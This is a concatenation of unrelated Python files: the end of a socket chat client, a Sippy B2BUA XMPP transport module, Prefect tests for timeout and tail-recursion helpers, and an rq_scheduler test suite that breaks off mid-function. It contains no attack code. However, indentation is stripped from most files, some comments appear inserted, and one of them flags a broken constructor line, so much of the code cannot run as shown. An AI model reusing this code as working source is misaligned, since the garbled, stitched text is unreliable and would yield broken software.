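                break
            print(data.decode())

    threading.Thread(target=reader, daemon=True).start()
    while True:
        c.send(input().encode())  # every typed line is relayed by the host to the others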
|
XMPP_server.py
|
#!/usr/local/bin/python
#
# Copyright (c) 2003-2005 Maxim Sobolev. All rights reserved.
# Copyright (c) 2006-2014 Sippy Software, Inc. All rights reserved.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import iksemel
import threading
import base64
import datetime, time
import traceback, sys, os
from select import poll, POLLIN, POLLOUT
from Sippy.Core.EventDispatcher import ED2
MAX_WORKERS = 5
class Worker(iksemel.Stream):
def __init__(self, owner, _id):
self.__owner = owner
self.__id = _id
self.__reconnect = True
self.__reconnect_count = 0
iksemel.Stream.__init__(self)
rx_thr = threading.Thread(target = self.run_rx)
rx_thr.setDaemon(True)
tx_thr = threading.Thread(target = self.run_tx)
tx_thr.setDaemon(True)
rx_thr.start()
tx_thr.start()
def on_xml(self, *args):
pass
def on_stanza(self, doc):
if doc.name() == 'incoming_packet':
data = base64.b64decode(doc.get('msg'))
raddr = (doc.get('src_addr'), int(doc.get('src_port')))
laddr = (doc.get('dst_addr'), int(doc.get('dst_port')))
rtime = float(doc.get('rtime'))
ED2.callFromThread(self.__owner.handle_read, data, raddr, laddr, rtime)
def run_rx(self):
prev_reconnect_count = -1
while True:
if self.__owner._shutdown:
return
if self.__reconnect:
time.sleep(0.1)
continue
try:
# between the check and write to prev_reconnect_count the self.__reconnect_count may change
curr_reconnect_count = self.__reconnect_count
if curr_reconnect_count != prev_reconnect_count:
prev_reconnect_count = curr_reconnect_count
pollobj = poll()
pollobj.register(self.fileno(), POLLIN)
pollret = dict(pollobj.poll())
if pollret.get(self.fileno(), 0) & POLLIN == 0:
continue
self.recv()
except:
print datetime.datetime.now(), 'XMPP_server: unhandled exception when receiving incoming data'
print '-' * 70
traceback.print_exc(file = sys.stdout)
print '-' * 70
sys.stdout.flush()
self.__reconnect = True
self.__owner._wi_available.acquire()
self.__owner._wi_available.notifyAll()
self.__owner._wi_available.release()
time.sleep(0.1)
def run_tx(self):
try:
self.__run_tx()
except:
print datetime.datetime.now(), 'XMPP_server: unhandled exception when processing outgoing data'
print '-' * 70
traceback.print_exc(file = sys.stdout)
print '-' * 70
sys.stdout.flush()
def __run_tx(self):
buf = ''
first_time = True
while True:
if self.__owner._shutdown:
return
if self.__reconnect:
buf = '' # throw away unsent data
if len(buf) == 0:
data, addr = None, None
if not self.__reconnect:
self.__owner._wi_available.acquire()
while len(self.__owner._wi) == 0 and not self.__reconnect:
self.__owner._wi_available.wait()
if self.__owner._shutdown:
os.close(self.fileno())
self.__owner._wi_available.release()
return
if len(self.__owner._wi) > 0:
data, addr, laddress = self.__owner._wi.pop(0)
self.__owner._wi_available.release()
if self.__reconnect:
#print self, self.__reconnect_count
if not first_time:
time.sleep(0.1)
try:
os.close(self.fileno())
except:
pass
try:
self.connect(jid=iksemel.JID('127.0.0.1'), tls=False, port=22223)
first_time = False
os.write(self.fileno(), '<b2bua_slot id="%s"/>' % self.__id)
pollobj = poll()
pollobj.register(self.fileno(), POLLOUT)
except iksemel.StreamError:
continue
except:
traceback.print_exc(file = sys.stdout)
sys.stdout.flush()
continue
self.__reconnect = False
self.__reconnect_count += 1
if data == None:
continue
dst_addr, dst_port = addr
buf = '<outgoing_packet dst_addr="%s" dst_port="%s" ' \
'src_addr="%s" src_port="%s" ' \
'msg="%s"/>' % (dst_addr, dst_port,
laddress[0], laddress[1],
base64.b64encode(data))
if self.__owner._shutdown:
os.close(self.fileno())
return
pollret = dict(pollobj.poll())
if pollret.get(self.fileno(), 0) & POLLOUT == 0:
continue
try:
sent = os.write(self.fileno(), buf)
buf = buf[sent:]
except IOError:
# wait for reconnect
self.__reconnect = True
except OSError:
# wait for reconnect
self.__reconnect = True
class XMPP_server_opts(object):
laddress = None
data_callback = None
def __init__(self, laddress, data_callback):
self.laddress = laddress
self.data_callback = data_callback
def getCopy(self):
return self.__class__(self.laddress, self.data_callback)
class _XMPP_server(object):
_uopts = None
def __init__(self, uopts, real_server):
self._uopts = uopts
self.real_server = real_server
def send_to(self, data, address):
self.real_server._wi_available.acquire()
self.real_server._wi.append((data, address, self._uopts.laddress))
self.real_server._wi_available.notify()
self.real_server._wi_available.release()
def shutdown(self):
self.real_server.shutdown()
self.real_server = None
class XMPP_server(object):
uopts = None
def __init__(self, global_config, uopts):
self.uopts = uopts.getCopy()
self._shutdown = False
        self.__data_callback = self.uopts.data_callback  # 'data_callback' is not a parameter of this constructor
self._wi_available = threading.Condition()
self._wi = []
self.lservers = {}
if type(global_config) == dict:
_id = global_config.get('xmpp_b2bua_id', 5061)
else:
_id = global_config.getdefault('xmpp_b2bua_id', 5061)
for i in range(0, MAX_WORKERS):
Worker(self, _id)
def handle_read(self, data, address, laddress, rtime):
if len(data) > 0 and self.uopts.data_callback != None:
lserver = self.lservers.get(laddress, None)
if lserver == None:
                # _XMPP_server expects an options object, not a bare address tuple
                lserver_uopts = self.uopts.getCopy()
                lserver_uopts.laddress = laddress
                lserver = _XMPP_server(lserver_uopts, self)
self.lservers[laddress] = lserver
try:
self.uopts.data_callback(data, address, lserver, rtime)
except:
print datetime.datetime.now(), 'XMPP_server: unhandled exception when receiving incoming data'
print '-' * 70
traceback.print_exc(file = sys.stdout)
print '-' * 70
sys.stdout.flush()
def send_to(self, data, address):
self._wi_available.acquire()
self._wi.append((data, address, self.uopts.laddress))
self._wi_available.notify()
self._wi_available.release()
def shutdown(self):
self._shutdown = True
self._wi_available.acquire()
self._wi_available.notifyAll()
self._wi_available.release()
self.lservers = {}
self.uopts.data_callback = None
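# Hedged usage sketch (not part of the original module): how a caller might wire up the
# server above. The callback signature follows handle_read()'s call to
# uopts.data_callback(data, address, lserver, rtime); the addresses and the b2bua id are
# assumptions, so the snippet is left commented out.
#
#def echo_callback(data, address, server, rtime):
#    # bounce every payload back to where it came from
#    server.send_to(data, address)
#
#global_config = {'xmpp_b2bua_id': 5061}
#uopts = XMPP_server_opts(('127.0.0.1', 5060), echo_callback)
#server = XMPP_server(global_config, uopts)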
|
test_executors.py
|
import os
import multiprocessing
import sys
import threading
import tempfile
import time
import pytest
import prefect
from prefect.utilities.configuration import set_temporary_config
from prefect.utilities.executors import (
timeout_handler,
tail_recursive,
RecursiveCall,
)
def test_timeout_handler_times_out():
slow_fn = lambda: time.sleep(2)
with pytest.raises(TimeoutError):
timeout_handler(slow_fn, timeout=1)
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
def test_timeout_handler_actually_stops_execution():
with tempfile.TemporaryDirectory() as call_dir:
FILE = os.path.join(call_dir, "test.txt")
def slow_fn():
"Runs for 1.5 seconds, writes to file 6 times"
iters = 0
while iters < 6:
time.sleep(0.26)
with open(FILE, "a") as f:
f.write("called\n")
iters += 1
with pytest.raises(TimeoutError):
# allow for at most 3 writes
timeout_handler(slow_fn, timeout=1)
time.sleep(0.5)
with open(FILE, "r") as g:
contents = g.read()
assert len(contents.split("\n")) <= 4
def test_timeout_handler_passes_args_and_kwargs_and_returns():
def do_nothing(x, y=None):
return x, y
assert timeout_handler(do_nothing, 5, timeout=1, y="yellow") == (5, "yellow")
def test_timeout_handler_doesnt_swallow_bad_args():
def do_nothing(x, y=None):
return x, y
with pytest.raises(TypeError):
timeout_handler(do_nothing, timeout=1)
with pytest.raises(TypeError):
timeout_handler(do_nothing, 5, timeout=1, z=10)
with pytest.raises(TypeError):
timeout_handler(do_nothing, 5, timeout=1, y="s", z=10)
def test_timeout_handler_reraises():
def do_something():
raise ValueError("test")
with pytest.raises(ValueError, match="test"):
timeout_handler(do_something, timeout=1)
@pytest.mark.skipif(sys.platform == "win32", reason="Test fails on Windows")
def test_timeout_handler_allows_function_to_spawn_new_process():
def my_process():
p = multiprocessing.Process(target=lambda: 5)
p.start()
p.join()
p.terminate()
assert timeout_handler(my_process, timeout=1) is None
@pytest.mark.skipif(sys.platform == "win32", reason="Test fails on Windows")
def test_timeout_handler_allows_function_to_spawn_new_thread():
def my_thread():
t = threading.Thread(target=lambda: 5)
t.start()
t.join()
assert timeout_handler(my_thread, timeout=1) is None
def test_timeout_handler_doesnt_do_anything_if_no_timeout(monkeypatch):
assert timeout_handler(lambda: 4, timeout=1) == 4
assert timeout_handler(lambda: 4) == 4
def test_timeout_handler_preserves_context():
def my_fun(x, **kwargs):
return prefect.context.get("test_key")
with prefect.context(test_key=42):
res = timeout_handler(my_fun, 2, timeout=1)
assert res == 42
def test_timeout_handler_preserves_logging(caplog):
timeout_handler(prefect.Flow("logs").run, timeout=2)
assert len(caplog.records) >= 2 # 1 INFO to start, 1 INFO to end
def test_recursion_go_case():
@tail_recursive
def my_func(a=0):
if a > 5:
return a
raise RecursiveCall(my_func, a + 2)
assert 6 == my_func()
def test_recursion_beyond_python_limits():
RECURSION_LIMIT = sys.getrecursionlimit()
@tail_recursive
def my_func(calls=0):
if calls > RECURSION_LIMIT + 10:
return calls
raise RecursiveCall(my_func, calls + 1)
assert my_func() == RECURSION_LIMIT + 11
def test_recursion_nested():
def utility_func(a):
if a > 5:
return a
raise RecursiveCall(my_func, a + 2)
@tail_recursive
def my_func(a=0):
return utility_func(a)
assert 6 == my_func()
def test_recursion_multiple():
call_checkpoints = []
@tail_recursive
def a_func(a=0):
call_checkpoints.append(("a", a))
if a > 5:
return a
a = b_func(a + 1)
raise RecursiveCall(a_func, (a + 1) * 2)
@tail_recursive
def b_func(b=0):
call_checkpoints.append(("b", b))
if b > 5:
return b
b = a_func(b + 2)
raise RecursiveCall(b_func, b + 2)
assert a_func() == 42 # :)
assert call_checkpoints == [
("a", 0),
("b", 1),
("a", 3),
("b", 4),
("a", 6),
("b", 8),
("a", 18),
("b", 20),
("a", 42),
]
def test_recursion_raises_when_not_decorated():
call_checkpoints = []
@tail_recursive
def a_func(a=0):
call_checkpoints.append(("a", a))
if a > 5:
return a
a = b_func(a + 1)
raise RecursiveCall(a_func, (a + 1) * 2)
def b_func(b=0):
call_checkpoints.append(("b", b))
if b > 5:
return b
b = a_func(b + 2)
raise RecursiveCall(b_func, b + 2)
with pytest.raises(RecursionError):
assert a_func()
assert call_checkpoints == [("a", 0), ("b", 1), ("a", 3), ("b", 4), ("a", 6)]
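# Hedged sketch (outside the tests above): the tail_recursive/RecursiveCall pattern these
# tests exercise, applied to a plain countdown. Only names already imported in this file
# are used; the function itself is hypothetical.
@tail_recursive
def _example_countdown(n=100000):
    """Counts down to zero without growing the Python call stack."""
    if n == 0:
        return "done"
    # Instead of calling _example_countdown(n - 1) directly, raise a RecursiveCall;
    # the decorator catches it and re-invokes the function with the new argument.
    raise RecursiveCall(_example_countdown, n - 1)
# _example_countdown() returns "done" even though n starts far above sys.getrecursionlimit().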
|
test_scheduler.py
|
from datetime import datetime, timedelta
import os
import signal
import time
from threading import Thread
from rq import Queue
from rq.compat import as_text
from rq.job import Job
from rq_scheduler import Scheduler
from rq_scheduler.utils import to_unix, from_unix, get_next_scheduled_time, get_utc_timezone
from tests import RQTestCase
def say_hello(name=None):
"""A job with a single argument and a return value."""
if name is None:
name = 'Stranger'
return 'Hi there, %s!' % (name,)
def tl(l):
return [as_text(i) for i in l]
def simple_addition(x, y, z):
return x + y + z
class TestScheduler(RQTestCase):
def setUp(self):
super(TestScheduler, self).setUp()
self.scheduler = Scheduler(connection=self.testconn)
def test_acquire_lock(self):
"""
        When the scheduler acquires a lock, besides creating a key, it should
        also set an expiry that's a few seconds longer than its polling
        interval, so the lock automatically expires if the scheduler is
        unexpectedly terminated.
"""
key = '%s_lock' % Scheduler.scheduler_key
self.assertNotIn(key, tl(self.testconn.keys('*')))
scheduler = Scheduler(connection=self.testconn, interval=20)
self.assertTrue(scheduler.acquire_lock())
self.assertIn(key, tl(self.testconn.keys('*')))
self.assertEqual(self.testconn.ttl(key), 30)
scheduler.remove_lock()
self.assertNotIn(key, tl(self.testconn.keys('*')))
def test_no_two_schedulers_acquire_lock(self):
"""
Ensure that no two schedulers can acquire the lock at the
same time. When removing the lock, only the scheduler which
originally acquired the lock can remove the lock.
"""
key = '%s_lock' % Scheduler.scheduler_key
self.assertNotIn(key, tl(self.testconn.keys('*')))
scheduler1 = Scheduler(connection=self.testconn, interval=20)
scheduler2 = Scheduler(connection=self.testconn, interval=20)
self.assertTrue(scheduler1.acquire_lock())
self.assertFalse(scheduler2.acquire_lock())
self.assertIn(key, tl(self.testconn.keys('*')))
scheduler2.remove_lock()
self.assertIn(key, tl(self.testconn.keys('*')))
scheduler1.remove_lock()
self.assertNotIn(key, tl(self.testconn.keys('*')))
def test_create_job(self):
"""
Ensure that jobs are created properly.
"""
job = self.scheduler._create_job(say_hello, args=(), kwargs={})
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job, job_from_queue)
self.assertEqual(job_from_queue.func, say_hello)
def test_create_job_with_ttl(self):
"""
Ensure that TTL is passed to RQ.
"""
job = self.scheduler._create_job(say_hello, ttl=2, args=(), kwargs={})
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(2, job_from_queue.ttl)
def test_create_job_with_id(self):
"""
Ensure that ID is passed to RQ.
"""
job = self.scheduler._create_job(say_hello, id='id test', args=(), kwargs={})
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual('id test', job_from_queue.id)
def test_create_job_with_description(self):
"""
Ensure that description is passed to RQ.
"""
job = self.scheduler._create_job(say_hello, description='description', args=(), kwargs={})
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual('description', job_from_queue.description)
def test_create_job_with_timeout(self):
"""
Ensure that timeout is passed to RQ.
"""
timeout = 13
job = self.scheduler._create_job(say_hello, timeout=13, args=(), kwargs={})
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(timeout, job_from_queue.timeout)
def test_job_not_persisted_if_commit_false(self):
"""
Ensure jobs are only saved to Redis if commit=True.
"""
job = self.scheduler._create_job(say_hello, commit=False)
self.assertEqual(self.testconn.hgetall(job.key), {})
def test_create_scheduled_job(self):
"""
Ensure that scheduled jobs are put in the scheduler queue with the right score
"""
scheduled_time = datetime.utcnow()
job = self.scheduler.enqueue_at(scheduled_time, say_hello)
self.assertEqual(job, Job.fetch(job.id, connection=self.testconn))
self.assertIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
self.assertEqual(self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id),
to_unix(scheduled_time))
def test_create_job_with_meta(self):
"""
Ensure that meta information on the job is passed to rq
"""
expected = {'say': 'hello'}
job = self.scheduler._create_job(say_hello, meta=expected)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(expected, job_from_queue.meta)
def test_enqueue_at_sets_timeout(self):
"""
Ensure that a job scheduled via enqueue_at can be created with
a custom timeout.
"""
timeout = 13
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello, timeout=timeout)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.timeout, timeout)
def test_enqueue_at_sets_job_id(self):
"""
Ensure that a job scheduled via enqueue_at can be created with
a custom job id.
"""
job_id = 'test_id'
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello, job_id=job_id)
self.assertEqual(job.id, job_id)
def test_enqueue_at_sets_job_ttl(self):
"""
Ensure that a job scheduled via enqueue_at can be created with a custom job ttl.
"""
job_ttl = 123456789
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello, job_ttl=job_ttl)
self.assertEqual(job.ttl, job_ttl)
def test_enqueue_at_sets_job_result_ttl(self):
"""
Ensure that a job scheduled via enqueue_at can be created with a custom result ttl.
"""
job_result_ttl = 1234567890
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello, job_result_ttl=job_result_ttl)
self.assertEqual(job.result_ttl, job_result_ttl)
def test_enqueue_at_sets_meta(self):
"""
Ensure that a job scheduled via enqueue_at can be created with a custom meta.
"""
meta = {'say': 'hello'}
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello, meta=meta)
self.assertEqual(job.meta, meta)
def test_enqueue_in(self):
"""
Ensure that jobs have the right scheduled time.
"""
right_now = datetime.utcnow()
time_delta = timedelta(minutes=1)
job = self.scheduler.enqueue_in(time_delta, say_hello)
self.assertIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
self.assertEqual(self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id),
to_unix(right_now + time_delta))
time_delta = timedelta(hours=1)
job = self.scheduler.enqueue_in(time_delta, say_hello)
self.assertEqual(self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id),
to_unix(right_now + time_delta))
def test_enqueue_in_sets_timeout(self):
"""
Ensure that a job scheduled via enqueue_in can be created with
a custom timeout.
"""
timeout = 13
job = self.scheduler.enqueue_in(timedelta(minutes=1), say_hello, timeout=timeout)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.timeout, timeout)
def test_enqueue_in_sets_job_id(self):
"""
Ensure that a job scheduled via enqueue_in can be created with
a custom job id.
"""
job_id = 'test_id'
job = self.scheduler.enqueue_in(timedelta(minutes=1), say_hello, job_id=job_id)
self.assertEqual(job.id, job_id)
def test_enqueue_in_sets_job_ttl(self):
"""
Ensure that a job scheduled via enqueue_in can be created with a custom job ttl.
"""
job_ttl = 123456789
job = self.scheduler.enqueue_in(timedelta(minutes=1), say_hello, job_ttl=job_ttl)
self.assertEqual(job.ttl, job_ttl)
def test_enqueue_in_sets_job_result_ttl(self):
"""
Ensure that a job scheduled via enqueue_in can be created with a custom result ttl.
"""
job_result_ttl = 1234567890
job = self.scheduler.enqueue_in(timedelta(minutes=1), say_hello, job_result_ttl=job_result_ttl)
self.assertEqual(job.result_ttl, job_result_ttl)
def test_enqueue_in_sets_meta(self):
"""
Ensure that a job scheduled via enqueue_in sets meta.
"""
meta = {'say': 'hello'}
job = self.scheduler.enqueue_in(timedelta(minutes=1), say_hello, meta=meta)
self.assertEqual(job.meta, meta)
def test_count(self):
now = datetime.utcnow()
self.scheduler.enqueue_at(now, say_hello)
self.assertEqual(self.scheduler.count(), 1)
future_time = now + timedelta(hours=1)
future_test_time = now + timedelta(minutes=59, seconds=59)
self.scheduler.enqueue_at(future_time, say_hello)
self.assertEqual(self.scheduler.count(timedelta(minutes=59, seconds=59)), 1)
self.assertEqual(self.scheduler.count(future_test_time), 1)
self.assertEqual(self.scheduler.count(), 2)
def test_get_jobs(self):
"""
Ensure get_jobs() returns all jobs until the specified time.
"""
now = datetime.utcnow()
job = self.scheduler.enqueue_at(now, say_hello)
self.assertIn(job, self.scheduler.get_jobs(now))
future_time = now + timedelta(hours=1)
job = self.scheduler.enqueue_at(future_time, say_hello)
self.assertIn(job, self.scheduler.get_jobs(timedelta(hours=1, seconds=1)))
self.assertIn(job, [j[0] for j in self.scheduler.get_jobs(with_times=True)])
self.assertIsInstance(list(self.scheduler.get_jobs(with_times=True))[0][1], datetime)
self.assertNotIn(job, self.scheduler.get_jobs(timedelta(minutes=59, seconds=59)))
def test_get_jobs_slice(self):
"""
Ensure get_jobs() returns the appropriate slice of all jobs using offset and length.
"""
now = datetime.utcnow()
future_time = now + timedelta(hours=1)
future_test_time = now + timedelta(minutes=59, seconds=59)
# Schedule each job a second later than the previous job,
# otherwise Redis will return jobs that have the same scheduled time in
# lexicographical order (not the order in which we enqueued them)
now_jobs = [self.scheduler.enqueue_at(now + timedelta(seconds=x), say_hello)
for x in range(15)]
future_jobs = [self.scheduler.enqueue_at(future_time + timedelta(seconds=x), say_hello)
for x in range(15)]
expected_slice = now_jobs[5:] + future_jobs[:10] # last 10 from now_jobs and first 10 from future_jobs
expected_until_slice = now_jobs[5:] # last 10 from now_jobs
jobs = self.scheduler.get_jobs()
jobs_slice = self.scheduler.get_jobs(offset=5, length=20)
jobs_until_slice = self.scheduler.get_jobs(future_test_time, offset=5, length=20)
self.assertEqual(now_jobs + future_jobs, list(jobs))
self.assertEqual(expected_slice, list(jobs_slice))
self.assertEqual(expected_until_slice, list(jobs_until_slice))
def test_get_jobs_to_queue(self):
"""
        Ensure that jobs scheduled in the future are not queued.
"""
now = datetime.utcnow()
job = self.scheduler.enqueue_at(now, say_hello)
self.assertIn(job, self.scheduler.get_jobs_to_queue())
future_time = now + timedelta(hours=1)
job = self.scheduler.enqueue_at(future_time, say_hello)
self.assertNotIn(job, self.scheduler.get_jobs_to_queue())
def test_enqueue_job(self):
"""
When scheduled job is enqueued, make sure:
- Job is removed from the sorted set of scheduled jobs
- "enqueued_at" attribute is properly set
- Job appears in the right queue
- Queue is recognized by rq's Queue.all()
"""
now = datetime.utcnow()
queue_name = 'foo'
scheduler = Scheduler(connection=self.testconn, queue_name=queue_name)
job = scheduler.enqueue_at(now, say_hello)
self.scheduler.enqueue_job(job)
self.assertNotIn(job, tl(self.testconn.zrange(scheduler.scheduled_jobs_key, 0, 10)))
job = Job.fetch(job.id, connection=self.testconn)
self.assertTrue(job.enqueued_at is not None)
queue = scheduler.get_queue_for_job(job)
self.assertIn(job, queue.jobs)
queue = Queue.from_queue_key('rq:queue:{0}'.format(queue_name))
self.assertIn(job, queue.jobs)
self.assertIn(queue, Queue.all())
def test_enqueue_job_with_scheduler_queue(self):
"""
Ensure that job is enqueued correctly when the scheduler is bound
to a queue object and job queue name is not provided.
"""
queue = Queue('foo', connection=self.testconn)
scheduler = Scheduler(connection=self.testconn, queue=queue)
job = scheduler._create_job(say_hello)
scheduler_queue = scheduler.get_queue_for_job(job)
self.assertEqual(queue, scheduler_queue)
scheduler.enqueue_job(job)
self.assertTrue(job.enqueued_at is not None)
self.assertIn(job, queue.jobs)
self.assertIn(queue, Queue.all())
def test_enqueue_job_with_job_queue_name(self):
"""
Ensure that job is enqueued correctly when queue_name is provided
at job creation
"""
queue = Queue('foo', connection=self.testconn)
job_queue = Queue('job_foo', connection=self.testconn)
scheduler = Scheduler(connection=self.testconn, queue=queue)
job = scheduler._create_job(say_hello, queue_name='job_foo')
self.assertEqual(scheduler.get_queue_for_job(job), job_queue)
scheduler.enqueue_job(job)
self.assertTrue(job.enqueued_at is not None)
self.assertIn(job, job_queue.jobs)
self.assertIn(job_queue, Queue.all())
def test_enqueue_at_with_job_queue_name(self):
"""
Ensure that job is enqueued correctly when queue_name is provided
to enqueue_at
"""
queue = Queue('foo', connection=self.testconn)
job_queue = Queue('job_foo', connection=self.testconn)
scheduler = Scheduler(connection=self.testconn, queue=queue)
job = scheduler.enqueue_at(datetime.utcnow(), say_hello, queue_name='job_foo')
self.assertEqual(scheduler.get_queue_for_job(job), job_queue)
self.scheduler.enqueue_job(job)
self.assertTrue(job.enqueued_at is not None)
self.assertIn(job, job_queue.jobs)
self.assertIn(job_queue, Queue.all())
def test_job_membership(self):
now = datetime.utcnow()
job = self.scheduler.enqueue_at(now, say_hello)
self.assertIn(job, self.scheduler)
self.assertIn(job.id, self.scheduler)
self.assertNotIn("non-existing-job-id", self.scheduler)
def test_cancel_scheduled_job(self):
"""
When scheduled job is canceled, make sure:
- Job is removed from the sorted set of scheduled jobs
"""
# schedule a job to be enqueued one minute from now
time_delta = timedelta(minutes=1)
job = self.scheduler.enqueue_in(time_delta, say_hello)
# cancel the scheduled job and check that it's gone from the set
self.scheduler.cancel(job)
self.assertNotIn(job.id, tl(self.testconn.zrange(
self.scheduler.scheduled_jobs_key, 0, 1)))
def test_change_execution_time(self):
"""
        Ensure that when ``change_execution_time`` is called, the job's score is updated.
"""
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello)
new_date = datetime(2010, 1, 1)
self.scheduler.change_execution_time(job, new_date)
self.assertEqual(to_unix(new_date),
self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id))
self.scheduler.cancel(job)
self.assertRaises(ValueError, self.scheduler.change_execution_time, job, new_date)
def test_args_kwargs_are_passed_correctly(self):
"""
Ensure that arguments and keyword arguments are properly saved to jobs.
"""
job = self.scheduler.enqueue_at(datetime.utcnow(), simple_addition, 1, 1, 1)
self.assertEqual(job.args, (1, 1, 1))
job = self.scheduler.enqueue_at(datetime.utcnow(), simple_addition, z=1, y=1, x=1)
self.assertEqual(job.kwargs, {'x': 1, 'y': 1, 'z': 1})
job = self.scheduler.enqueue_at(datetime.utcnow(), simple_addition, 1, z=1, y=1)
self.assertEqual(job.kwargs, {'y': 1, 'z': 1})
self.assertEqual(job.args, (1,))
time_delta = timedelta(minutes=1)
job = self.scheduler.enqueue_in(time_delta, simple_addition, 1, 1, 1)
self.assertEqual(job.args, (1, 1, 1))
job = self.scheduler.enqueue_in(time_delta, simple_addition, z=1, y=1, x=1)
self.assertEqual(job.kwargs, {'x': 1, 'y': 1, 'z': 1})
job = self.scheduler.enqueue_in(time_delta, simple_addition, 1, z=1, y=1)
self.assertEqual(job.kwargs, {'y': 1, 'z': 1})
self.assertEqual(job.args, (1,))
def test_interval_and_repeat_persisted_correctly(self):
"""
Ensure that interval and repeat attributes are correctly saved.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=10, repeat=11)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.meta['interval'], 10)
self.assertEqual(job_from_queue.meta['repeat'], 11)
def test_crontab_persisted_correctly(self):
"""
Ensure that crontab attribute gets correctly saved in Redis.
"""
# create a job that runs one minute past each whole hour
job = self.scheduler.cron("1 * * * *", say_hello)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.meta['cron_string'], "1 * * * *")
# get the scheduled_time and convert it to a datetime object
unix_time = self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id)
datetime_time = from_unix(unix_time)
# check that minute=1, seconds=0, and is within an hour
assert datetime_time.minute == 1
assert datetime_time.second == 0
assert datetime_time - datetime.utcnow() < timedelta(hours=1)
def test_crontab_persisted_correctly_with_local_timezone(self):
"""
Ensure that crontab attribute gets correctly saved in Redis when using local TZ.
"""
# create a job that runs one minute past each whole hour
job = self.scheduler.cron("0 15 * * *", say_hello, use_local_timezone=True)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.meta['cron_string'], "0 15 * * *")
# get the scheduled_time and convert it to a datetime object
unix_time = self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id)
datetime_time = from_unix(unix_time)
expected_datetime_in_local_tz = datetime.now(get_utc_timezone()).replace(hour=15,minute=0,second=0,microsecond=0)
assert datetime_time.time() == expected_datetime_in_local_tz.astimezone(get_utc_timezone()).time()
def test_crontab_rescheduled_correctly_with_local_timezone(self):
# Create a job with a cronjob_string
job = self.scheduler.cron("1 15 * * *", say_hello, use_local_timezone=True)
# change crontab
job.meta['cron_string'] = "2 15 * * *"
# reenqueue the job
self.scheduler.enqueue_job(job)
# get the scheduled_time and convert it to a datetime object
unix_time = self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id)
datetime_time = from_unix(unix_time)
expected_datetime_in_local_tz = datetime.now(get_utc_timezone()).replace(hour=15,minute=2,second=0,microsecond=0)
assert datetime_time.time() == expected_datetime_in_local_tz.astimezone(get_utc_timezone()).time()
def test_crontab_sets_timeout(self):
"""
Ensure that a job scheduled via crontab can be created with
a custom timeout.
"""
timeout = 13
job = self.scheduler.cron("1 * * * *", say_hello, timeout=timeout)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.timeout, timeout)
def test_crontab_sets_id(self):
"""
Ensure that a job scheduled via crontab can be created with
a custom id
"""
job_id = "hello-job-id"
job = self.scheduler.cron("1 * * * *", say_hello, id=job_id)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_id, job_from_queue.id)
def test_crontab_sets_default_result_ttl(self):
"""
        Ensure that a job scheduled via crontab gets the proper default
        result_ttl (-1) for periodic tasks.
"""
job = self.scheduler.cron("1 * * * *", say_hello)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(-1, job_from_queue.result_ttl)
def test_crontab_sets_description(self):
"""
Ensure that a job scheduled via crontab can be created with
a custom description
"""
description = 'test description'
job = self.scheduler.cron("1 * * * *", say_hello, description=description)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(description, job_from_queue.description)
def test_repeat_without_interval_raises_error(self):
# Ensure that an error is raised if repeat is specified without interval
def create_job():
